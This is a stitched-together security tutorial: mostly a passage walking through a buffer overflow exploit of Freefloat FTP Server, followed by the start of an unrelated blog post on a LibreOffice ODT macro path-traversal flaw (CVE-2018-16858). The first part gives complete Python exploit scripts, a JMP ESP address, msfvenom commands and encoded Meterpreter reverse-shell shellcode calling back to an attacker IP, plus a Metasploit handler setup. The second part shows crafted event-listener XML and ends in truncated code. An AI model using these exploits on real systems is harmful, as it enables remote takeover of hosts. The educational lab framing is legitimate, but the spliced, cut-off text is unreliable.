These are the CPU registers we were talking about at the beginning of this article. We will be focusing most of our attention here. The first thing we need to do is take a look at the EIP register. As discussed earlier, EIP contains the memory address for the next CPU instruction. What this means is that if we can overwrite the EIP value by overflowing the buffer allocated to the REST command, we have the ability to control what the program does next. At the moment, we see that EIP contains the value 004040C0. Let's see what happens when we fire our python fuzz script at it again.

As we can see, EIP has now changed to 41414141. The number 41 is actually the hex value of the letter 'A' (reference). Essentially the EIP register now contains 'AAAA'. Since EIP now points to an invalid memory address, the application crashes. We now know the cause of the crash we discovered earlier and, to our delight, we have discovered that we can actually hijack the flow of execution by overwriting the value stored in the EIP register. This indicates that we have an exploitable buffer overflow vulnerability!

Buffer Overflow Exploitation

Alright, now we're going to get our hands dirty. Let's quickly recap what we have done so far:

Discovered a bug in the REST command which causes the Freefloat FTP Server to crash.
Developed a short script called 'fuzz.py' which crashes the application by supplying 1000 'A's to the REST command.
Determined that the bug we found is in fact an exploitable buffer overflow vulnerability.

Now it is time to begin developing a functional exploit. The goal of this exploit will be to obtain an interactive shell on the Windows VM (our victim) from our Kali Linux VM (our attacking machine). This will allow us to compromise the remote host and take control of it.

Installing mona.py

One of the awesome features of Immunity Debugger is its ability to be extended with Python plugins. Before we go any further, we will want to install a plugin called mona.py.
This will help us out greatly with the tasks ahead. Simply drop the plugin into the PyCommands folder found inside the Immunity Debugger application folder. You can check if mona.py is working by typing '!mona' in the command bar of Immunity Debugger. If everything works, the log window will show the help screen of mona.py.

Next, we will configure mona.py to store data in a folder other than the default. The default location is the Immunity Debugger application folder. Instead we will create a folder at the path 'C:\logs' and have mona.py store its data there. Execute the following command in the Immunity Debugger command bar:

!mona config -set workingfolder c:\logs\%p

The command above tells mona.py to create a folder inside the folder 'C:\logs', with the name of the process being debugged. In this case it will create a subfolder called 'FTPServer'. Now we are ready to begin crafting our exploit code.

Building the exploit

The process for developing our buffer overflow exploit can be summarized into six key tasks:

1. Finding the offset on the buffer to the exact four bytes that overwrite EIP on the stack.
2. Finding enough space in the memory to store our shellcode.
3. Finding the value we must put in EIP to make the execution flow jump to our shellcode in memory.
4. Finding any bad characters that may affect our exploit.
5. Putting it all together.
6. Generating our final payload.

We will break down each of these tasks and walk through them step by step.

Identifying the offset to EIP

First we will need to find the offset in our buffer to the bytes that overwrite the EIP register value. This part of the exploit is critical, as it will allow us to hijack the flow of execution. We can do this by using the 'pattern create' feature in mona.py. This creates a unique cyclic pattern (example: Aa0Aa1Aa2Aa3Aa4) where every three-character substring is unique.
By replacing the 1000 'A's in our 'fuzz.py' script with this pattern, we can calculate the offset by determining which four bytes of the pattern are in EIP when the program crashes. To create a cyclic pattern 1000 bytes in length with mona.py, execute the following command in the Immunity Debugger command bar:

!mona pc 1000

You should see the output below:

The command created the file 'C:\logs\FTPServer\pattern.txt' with the cyclic pattern inside. We can now copy the pattern into our existing 'fuzz.py' script. We will go ahead and rename this file to 'exploit.py' since we are past the fuzzing stage at this point. Here is what the updated code looks like:

import sys
from socket import *

ip = "172.16.183.129"
port = 21
buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

print "[+] Connecting..."
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()
print "[+] Done."
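To see why the cyclic pattern pins down the offset, here is a from-scratch reimplementation of the same upper/lower/digit scheme (a sketch for illustration; mona's actual code differs). The value that lands in EIP at the crash, unpacked little-endian, gives the four buffer bytes, and their position in the pattern is the offset:

```python
import string
import struct

def pattern_create(length):
    # Same Upper-lower-digit grouping as mona/Metasploit patterns.
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(eip_value, length=1000):
    # x86 is little-endian, so EIP = 0x41326941 means the buffer bytes
    # at the overwrite were "Ai2A".
    needle = struct.pack("<I", eip_value).decode()
    return pattern_create(length).find(needle)

print(pattern_offset(0x41326941))  # 246
```

The crash we are about to trigger leaves 0x41326941 in EIP, and the lookup above lands on offset 246, matching what !mona findmsp reports.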
The next step is to reopen Freefloat FTP Server in Immunity Debugger and execute our script 'exploit.py'. As expected, we can see that the process has crashed and Immunity Debugger shows an access violation. We need to examine EIP and take note of its value at the moment of the crash. As we can see, the EIP register has been overwritten, this time with a unique 4 byte pattern. Its value at the time of the crash was '41326941', which translates to the characters 'A2iA' (reference). If we look close enough at our 'pattern.txt' file, we would find this value somewhere inside the pattern we generated earlier. We need to determine the offset by examining the unique pattern and counting how many bytes lead up to 'A2iA'. This will be our EIP offset. To make our life easier, mona.py offers the findmsp command, which will give us the EIP offset as well as some other very useful information. Execute the following command on the Immunity Debugger command bar:

!mona findmsp

You should see the output below:

This command created a file at 'C:\logs\FTPServer\findmsp.txt' which contains some extremely useful information that we will use to develop our exploit. We can see that our EIP offset is 246 bytes. The next 4 bytes after this will overwrite the EIP register.

Identifying where to put our shellcode

So we now have control over Freefloat FTP Server's flow of execution, but we still need to find a place to store our shellcode. Our shellcode is the actual payload of the exploit; it is what will give us an interactive shell on the remote system. From the output of the '!mona findmsp' command above, we can see that the offset to ESP is 258 bytes. The output also tells us that we have 742 bytes available in ESP to store data. We also notice that the ESP offset is relatively close to the EIP offset in our buffer. Let's do some simple math. If we subtract 246 bytes (EIP offset) from 258 bytes (ESP offset) we get 12 bytes.
We will be writing 4 bytes into the EIP register, so we will subtract 4 from 12 and get 8 bytes. We have just determined that the ESP offset is only 8 bytes past our EIP overwrite. Why is this important? Because when we craft our exploit we can overwrite EIP with the address of a JMP ESP instruction, pad our buffer with just 8 more bytes, and then write our shellcode to ESP. If these two offsets were far apart from each other, or if we didn't have sufficient space in ESP, this exploit could become a lot more complicated. For example, we may potentially run out of buffer room for our shellcode, or need to find another area in memory to place our shellcode. In this case, ESP looks like it would provide a very convenient place for us to store our shellcode. We will eventually try placing our shellcode in the ESP register at offset 258, but we're not quite ready to do that yet. When we overwrite EIP, our objective will be to change the flow of execution to our shellcode stored in ESP. In order to do that, we will need to get the memory address of a CPU instruction that makes a jump to ESP. We will do this by locating a JMP ESP instruction and overwriting EIP with the memory address of that instruction.

Locating a JMP ESP instruction

So we've successfully hijacked the application by overwriting EIP, and we think we've found a sufficient place in memory to store our shellcode. Next we need to find an existing CPU instruction in the program which will tell the CPU to execute our shellcode stored in ESP. To accomplish this we will locate a JMP ESP instruction in memory using Immunity Debugger and mona.py. In the Immunity Debugger command bar, execute the following command after restarting the Freefloat FTP Server application:

!mona jmp -r ESP

You should see the output below:

The above command tells mona.py to search for a JMP ESP instruction inside the process binary and the DLLs loaded in memory at execution time.
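Conceptually, this search boils down to scanning module memory for the two-byte x86 opcode of JMP ESP, FF E4 (mona does considerably more, such as filtering by module protections and ASLR flags). A minimal illustration of that scan over a fake module dump:

```python
JMP_ESP = b"\xff\xe4"  # x86 opcode bytes for JMP ESP

def find_jmp_esp(image_bytes, image_base):
    # Return the virtual address of every JMP ESP occurrence in a dump.
    hits = []
    i = image_bytes.find(JMP_ESP)
    while i != -1:
        hits.append(image_base + i)
        i = image_bytes.find(JMP_ESP, i + 1)
    return hits

# Fake module dump with two occurrences, at offsets 4 and 9:
blob = b"\x90" * 4 + JMP_ESP + b"\xcc" * 3 + JMP_ESP
print([hex(a) for a in find_jmp_esp(blob, 0x400000)])  # ['0x400004', '0x400009']
```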
The result is stored in the file 'C:\logs\FTPServer\jmp.txt'. Below is a partial screenshot of the output from that file:

We will need to choose a JMP ESP instruction which does not have ASLR enabled, as we need the memory address to persist between restarts of the application. Thankfully in this case, the binary was not compiled with ASLR support. Therefore any of the JMP ESP instructions in this list should work fine for our exploit…almost…(more on that in the next section). We will overwrite EIP with the address of one of these instructions, and that should make the CPU jump to our shellcode. By this point we know just about everything we need to know about Freefloat FTP Server to complete our exploit. We are ready to start building our final payload which will give us a shell on the remote host. Unfortunately, there is one more potential pitfall standing in our way. Bad characters!

Identifying bad characters

So we almost have everything we need to build our exploit. We know how to hijack the flow of execution, we know where to put our payload, and we know how to trick the CPU into executing our payload. Now we are finally ready to start building the payload! There is just one problem: the shellcode we want to use will likely contain one or more characters that the application interprets differently than we want it to. It's also possible that the memory address for one of our JMP ESP instructions above may contain one of these characters. These are referred to as bad characters, which are essentially any unwanted characters that can break our shellcode. Unfortunately there is no universal set of bad characters. Depending on the application and the developer logic, there will be a different set of bad characters for every program that we encounter. Therefore, we will have to identify the bad characters in this specific application before generating our shellcode.
An example of some common bad characters:

00 (NULL byte)
0A (Line Feed, \n)
0D (Carriage Return, \r)
FF (0xFF)

This part of the process can be a bit tedious and repetitive. We essentially need to overwrite EIP with garbage to crash the application, and then overflow the rest of the buffer with another pattern containing all the possible shellcode characters. Then we examine the stack at the time of the crash, and find the first character which breaks the pattern. Once we have identified that character, we remove it from the pattern and repeat the process to find the next bad character. We do this over and over again until we have identified them all. Then we will generate functional shellcode that is encoded in such a way as to exclude these bad characters. This process is made a little easier by using two awesome commands in mona.py, however it is still quite repetitive. Let's break down the task at hand before we examine the commands:

1. Create a byte array with all possible characters in hex form (0x00 to 0xff) and put it into our exploit.
2. Launch Immunity Debugger and run Freefloat FTP Server.
3. Execute the exploit.
4. After the crash, examine the byte array in memory. If a byte has changed, it is a bad character.
5. Remove the bad character from the array.
6. Repeat the process until the byte array in memory is equal to the byte array being sent in the buffer.

To create the byte array execute the following command in Immunity Debugger:

!mona bytearray

You should see the output below:

The above command will generate two files. The first is ‘C:\logs\FTPServer\bytearray.txt’, which contains the array in text format to use in our exploit. The second is ‘C:\logs\FTPServer\bytearray.bin’, which contains the exact representation of this byte array in memory.
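The byte array mona generates is nothing magical — it is simply every value from 0x00 to 0xff, minus whatever bad characters have been excluded so far. A rough Python equivalent of what ‘!mona bytearray -cpb ...’ produces (a sketch, not mona's actual implementation):

```python
# Build a test string of all 256 byte values, excluding known bad
# characters -- conceptually the same array mona writes to bytearray.bin.
def make_bytearray(badchars=()):
    return bytes(b for b in range(256) if b not in badchars)

full = make_bytearray()
print(len(full))  # 256 -- every value from 0x00 through 0xff

# After excluding the bad characters found for this application:
reduced = make_bytearray(badchars=(0x00, 0x0a, 0x0d))
print(len(reduced))  # 253 -- the first remaining byte is 0x01
```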
Let's modify our exploit to include the byte array:

import sys
from socket import *

ip = "172.16.183.129"
port = 21

bytearray = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

bufsize = 1000

buf = 'A'*246      # EIP offset from findmsp
buf += 'BBBB'      # EIP overwrite
buf += 'C'*8       # Add 8 additional bytes of padding to align the bytearray with ESP
buf += bytearray
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()
print "[+] Done."

Note that we put the byte array exactly 8 bytes behind our EIP overwrite (the four ‘B’s) by adding 8 ‘C’s. This is so the ESP register will be pointing directly to the byte array after the application crashes. We also fill the remaining bytes of our buffer with ‘D’s to ensure that the buffer length is consistent with our testing earlier (1000 bytes total).
Now let's relaunch Immunity Debugger, run Freefloat FTP Server, and fire our revised exploit. Once the application has crashed, enter the following command in Immunity Debugger:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C (the address contained in ESP)

The above command tells mona.py to compare the memory at the address ‘0x00B3FC2C’ with the content of the bytearray.bin file. This address will likely be different if you are testing on a different operating system such as Windows Vista or Windows 7. As we can see from the ‘Status’ and ‘BadChars’ columns, there is corruption in the first byte due to the character ‘00’ (this is a NULL byte, a common bad character). Let's recreate the byte array excluding this character (0x00), and then run the ‘!mona compare’ command again, by executing the following command:

!mona bytearray -cpb \x00

Now we will update our exploit and remove the ‘\x00’ character from the beginning of the byte array. We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once more:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C

Notice the difference? This time mona.py has detected corruption at byte 9 due to the ‘0a’ character. Now we will exclude 0x0a from the byte array:

!mona bytearray -cpb \x00\x0a

Next we will update our exploit and remove the ‘\x0a’ character from the byte array. We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once more:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C

Once again we’ve identified another bad character. This time it is the ‘0d’ character, so we’ll need to exclude 0x0d from the byte array:

!mona bytearray -cpb \x00\x0a\x0d

Now we will update our exploit once again and remove the ‘\x0d’ character from the byte array.
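The comparison mona performs here boils down to walking both byte sequences in lockstep and reporting the first position where the copy in memory no longer matches what we sent. A sketch of that check (mona reads the in-memory side from the crashed process; here both sides are plain byte strings):

```python
# Return the index and value of the first byte that was mangled in memory,
# or None if the sequences match (i.e. no bad characters remain).
def first_badchar(sent, in_memory):
    for i, (a, b) in enumerate(zip(sent, in_memory)):
        if a != b:
            return i, a
    return None

sent = bytes(range(1, 16))
corrupted = sent.replace(b"\x0a", b"\x00")   # pretend 0x0a got mangled
print(first_badchar(sent, corrupted))        # (9, 10) -> 0x0a at index 9
print(first_badchar(sent, sent))             # None -> array is unmodified
```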
We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once again:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C

This time the comparison results window indicates the array is ‘Unmodified’. This means that our byte array in memory is equal to the byte array we transmitted in our exploit, thus indicating we have identified all of the bad characters! We now have everything we need to weaponize our exploit. We just need to ensure that our shellcode, JMP ESP instruction, and any other data we transmit in the exploit do not contain the characters 0x00, 0x0a, or 0x0d.

Putting it all together

Now that we finally have all the information we need to build a working exploit, let's start putting it all together. We’ll first update our exploit by replacing the byte array with some more useful shellcode. We’re also going to choose a JMP ESP instruction from our list earlier to overwrite EIP. We will take care not to use a JMP instruction whose address contains a bad character (0x00, 0x0a, or 0x0d):

import sys
from socket import *

ip = "172.16.183.129"
port = 21

# BadChars = \x00\x0a\x0d
shellcode = ("\xcc\xcc\xcc\xcc") # Breakpoint

bufsize = 1000
eip = "\xd7\x30\x9d\x7c" # 0x7c9d30d7 - jmp esp [SHELL32.dll] (Little Endian)

buf = 'A'*246      # EIP offset from findmsp
buf += eip         # EIP overwrite
buf += 'C'*8       # Add 8 additional bytes of padding to align the bytearray with ESP
buf += shellcode
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()
print "[+] Done."

In this iteration of our exploit we are using the byte ‘0xcc’ as our shellcode. This is the opcode for the breakpoint instruction. We do this so that once the exploit is launched our process will stop when we get to ESP.
This will give us a chance to examine the stack and ensure that everything is working as we expect so far. We are choosing the JMP ESP instruction located at the memory address 0x7c9d30d7 to overwrite EIP. You may be wondering why it is entered backwards in our exploit. This is because the x86 architecture stores values in memory in little-endian byte order. This means the memory address has to be reversed byte by byte; in this case 0x7c9d30d7 will be converted to \xd7\x30\x9d\x7c. Now let's fire up Immunity Debugger, launch Freefloat FTP Server, and execute our exploit again:

You should notice the application did not crash this time! It actually hit one of our breakpoints and paused the debugger for us. In the above screenshot we can see execution has stopped at the four breakpoint opcodes on the stack just as we expected. This means we are successfully controlling the flow of execution; we just need to replace our current shellcode with the payload we will generate next!

Generating our final payload

We’ve come so far, we just need to use what we’ve built to get a shell on our target host. To do this we will utilize the Metasploit Framework to generate a Meterpreter reverse shell payload. This will act as our final shellcode. We will then catch this reverse shell on our Kali Linux machine, and through this we will have compromised the remote host with our exploit! Metasploit contains a handy utility called ‘msfvenom’ which we will use to generate our shellcode. We must make sure to tell msfvenom to exclude the bad characters we identified earlier, or our exploit will not work. When we generate shellcode encoded to avoid bad characters, the payload must contain a routine to decode the payload in memory. Msfvenom will handle this for us, however it does come with a catch. The decoding routine will shift the stack around on us, so we will need to move ESP to a location above our shellcode in memory.
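Rather than reversing the address byte by byte by hand, the little-endian conversion described above can be done with Python's standard struct module — packing the address as an unsigned 32-bit little-endian integer produces exactly the byte order we need:

```python
import struct

# "<I" = little-endian, unsigned 32-bit integer
eip = struct.pack("<I", 0x7c9d30d7)
# eip now holds the four bytes \xd7 \x30 \x9d \x7c,
# ready to drop into the buffer in place of a hand-reversed string.
print(eip.hex())  # 'd7309d7c'
```

This is handy when iterating on an exploit, since swapping in a different JMP ESP address only requires changing one integer.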
First, let's go ahead and generate our shellcode payload in Kali Linux by using the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.183.131 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f c

You should see the output below:

Next we need to ensure that ESP is not pointing to the shellcode when the decoder routine is executed. We will do this by adding an instruction which will decrement ESP. To obtain the opcodes that represent the instruction, we will use another tool from the Metasploit Framework, ‘metasm_shell.rb’. Execute the following commands on Kali Linux:

cd /usr/share/metasploit-framework/tools/exploit/
./metasm_shell.rb

The ‘metasm_shell.rb’ script will give us an interactive prompt where we can enter CPU instructions and get the appropriate opcodes. Since we want to decrement ESP, we will try the following command:

metasm > sub esp,240h
"\x81\xec\x40\x02\x00\x00"

Uh oh, we’ve hit a snag. Notice that the opcode we got contains one of our bad characters (\x00). This would break our exploit. Let's see if we can find another instruction that will achieve the same result, but hopefully does not produce opcodes containing bad characters. Instead of subtracting from ESP, let's try to add a negative number to it and see what happens:

metasm > add esp,-240h
"\x81\xc4\xc0\xfd\xff\xff"

Excellent, no bad characters this time! We can now exit metasm and finish building our exploit using:

metasm > quit

The Final Exploit

We are finally ready to build a weaponized exploit. Let's update the exploit to include the shellcode we’ve generated with ‘msfvenom’, and add the opcodes we got from ‘metasm_shell.rb’ to decrement ESP.
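The reason ‘add esp,-240h’ avoids the bad characters while ‘sub esp,240h’ does not comes down to two's-complement encoding: the immediate -0x240 is stored as 0xFFFFFDC0, whose little-endian bytes contain no nulls, while the positive immediate 0x240 pads out to a 32-bit value full of 0x00 bytes. This is easy to verify with struct:

```python
import struct

# sub esp,240h encodes the positive immediate 0x240 -> null bytes appear
print(struct.pack("<i", 0x240).hex())   # '40020000' -- note the 00 bytes
# add esp,-240h encodes -0x240 in two's complement -> no bad characters
print(struct.pack("<i", -0x240).hex())  # 'c0fdffff' -- clean
```

The second result matches the immediate portion of the opcodes metasm gave us (\x81\xc4 followed by \xc0\xfd\xff\xff).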
This will complete the final exploit:

import sys
from socket import *

ip = "172.16.183.129"
port = 21

# Windows reverse shell
shellcode = (
"\xb8\x18\xae\xa3\x93\xd9\xeb\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x56\x31\x47\x13\x83\xef\xfc\x03\x47\x17\x4c\x56\x6f\xcf\x12"
"\x99\x90\x0f\x73\x13\x75\x3e\xb3\x47\xfd\x10\x03\x03\x53\x9c"
"\xe8\x41\x40\x17\x9c\x4d\x67\x90\x2b\xa8\x46\x21\x07\x88\xc9"
"\xa1\x5a\xdd\x29\x98\x94\x10\x2b\xdd\xc9\xd9\x79\xb6\x86\x4c"
"\x6e\xb3\xd3\x4c\x05\x8f\xf2\xd4\xfa\x47\xf4\xf5\xac\xdc\xaf"
"\xd5\x4f\x31\xc4\x5f\x48\x56\xe1\x16\xe3\xac\x9d\xa8\x25\xfd"
"\x5e\x06\x08\x32\xad\x56\x4c\xf4\x4e\x2d\xa4\x07\xf2\x36\x73"
"\x7a\x28\xb2\x60\xdc\xbb\x64\x4d\xdd\x68\xf2\x06\xd1\xc5\x70"
"\x40\xf5\xd8\x55\xfa\x01\x50\x58\x2d\x80\x22\x7f\xe9\xc9\xf1"
"\x1e\xa8\xb7\x54\x1e\xaa\x18\x08\xba\xa0\xb4\x5d\xb7\xea\xd0"
"\x92\xfa\x14\x20\xbd\x8d\x67\x12\x62\x26\xe0\x1e\xeb\xe0\xf7"
"\x17\xfb\x12\x27\x9f\x6c\xed\xc8\xdf\xa5\x2a\x9c\x8f\xdd\x9b"
"\x9d\x44\x1e\x23\x48\xf0\x14\xb3\xdf\x14\x9e\xc0\x48\x16\xe0"
"\xc7\x33\x9f\x06\x97\x13\xcf\x96\x58\xc4\xaf\x46\x31\x0e\x20"
"\xb8\x21\x31\xeb\xd1\xc8\xde\x45\x89\x64\x46\xcc\x41\x14\x87"
"\xdb\x2f\x16\x03\xe9\xd0\xd9\xe4\x98\xc2\x0e\x93\x62\x1b\xcf"
"\x36\x62\x71\xcb\x90\x35\xed\xd1\xc5\x71\xb2\x2a\x20\x02\xb5"
"\xd5\xb5\x32\xcd\xe0\x23\x7a\xb9\x0c\xa4\x7a\x39\x5b\xae\x7a"
"\x51\x3b\x8a\x29\x44\x44\x07\x5e\xd5\xd1\xa8\x36\x89\x72\xc1"
"\xb4\xf4\xb5\x4e\x47\xd3\xc5\x89\xb7\xa1\xe1\x31\xdf\x59\xb2"
"\xc1\x1f\x30\x32\x92\x77\xcf\x1d\x1d\xb7\x30\xb4\x76\xdf\xbb"
"\x59\x34\x7e\xbb\x73\x98\xde\xbc\x70\x01\xd1\xc7\xf9\xb6\x12"
"\x38\x10\xd3\x13\x38\x1c\xe5\x28\xee\x25\x93\x6f\x32\x12\xac"
"\xda\x17\x33\x27\x24\x0b\x43\x62"
)

bufsize = 1000
eip = "\xd7\x30\x9d\x7c" # 0x7c9d30d7 - jmp esp [SHELL32.dll] (Little endian)
move_esp = "\x81\xc4\xc0\xfd\xff\xff" # add esp,-240h

buf = 'A'*246      # EIP offset from findmsp
buf += eip         # EIP overwrite
buf += move_esp
buf += 'C'*8       # Add 8 additional bytes of padding to align the bytearray with ESP
buf += shellcode
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()
print "[+] Done."

Now we will start up Metasploit on our Kali Linux machine with the following command:

msfconsole

Once it loads we will configure a listener to wait for our reverse shell. Execute the following commands in the Metasploit console:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.183.131
set LPORT 443
exploit

You should see the output below:

Finally we are ready to test our exploit. Launch Freefloat FTP Server once again, and fire our final exploit. If all goes well, we should receive a Meterpreter session on our Metasploit listener. If it worked, congratulations! You have just successfully exploited a buffer overflow vulnerability and obtained an interactive shell on the target!

Sursa: https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/
-
Friday, February 1, 2019

Libreoffice (CVE-2018-16858) - Remote Code Execution via Macro/Event execution

I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog. This blogpost will describe the vulnerability I discovered. It must be noted the vulnerability will be discussed in the context of Windows, but Linux can be exploited the same way.

Tested LibreOffice version: 6.1.2.1 (6.0.x does not allow passing parameters)
Tested Operating Systems: Windows + Linux (both affected)

The feature

I started to read the OpenDocument-v1.2-part1 specification to get a feeling for the file format. Additionally I created some odt files (which, similar to docx, are zip files containing files describing the file structure) so I could follow the file format specification properly. The specification for the office:scripts element piqued my interest, so I started to investigate how this element is used. I stumbled upon the scripting framework documentation (which specifies that Basic, BeanShell, Java, JavaScript and Python are supported). Additionally I discovered how to create an ODT file via the GUI, which uses the office:script element (thanks google). Open Libreoffice writer => Insert => Hyperlink and click on the gear wheel icon (open the image so you can properly read it): I chose to use the onmouseover event and the python sample installed with LibreOffice.
After assigning this script (or event as it is called in the LibreOffice world) and saving this file, I was able to have a look at the created file structure:

<script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&location=share" xlink:type="simple"/>

This looked like it is loading a file from the local file system, and that assumption is true (the path shown is for Windows but it is present for Linux as well):

C:\Program Files\LibreOffice\share\Scripts\python\pythonSamples\TableSample.py

The file contains a createTable function. So I opened the created ODT file and moved the mouse over the link, and to my surprise the python file was executed without any warning dialog.

Important side note: LibreOffice ships with its own python interpreter, so python does not even need to be installed.

The Bug

Given that a local python file is executed, the first thing I tried was path traversal. After unzipping I modified the script:event-listener element like this:

<script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../../../../../../../TableSample.py$createTable?language=Python&location=share" xlink:type="simple"/>

I zipped everything up, changed the extension to ODT and started ProcessMonitor. I configured it to only list libreoffice related events and opened the ODT file in LibreOffice. As soon as I moved my mouse over the hyperlink, and therefore executed the event, I saw that the path traversal worked as a FILE NOT FOUND event was shown in ProcessMonitor! To be sure that the feature still works with path traversal, I copy&pasted the original TableSample.py into the C:\ root directory and opened the ODT file again. Thankfully the python file was executed from C:\ as soon as the event was triggered.
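Since an ODT file is just a zip archive, the unzip/modify/rezip round trip can be automated. The sketch below is illustrative (the hrefs and file layout are assumptions; a real ODT additionally requires the mimetype entry to be stored first and uncompressed, which this sketch glosses over) — it patches the event listener inside an ODT using only Python's standard zipfile module:

```python
import io
import zipfile

# Rewrite content.xml inside an ODT (zip) archive, swapping the script
# href for a path-traversal one. Hrefs here are illustrative.
def patch_odt(odt_bytes, old_href, new_href):
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as src, \
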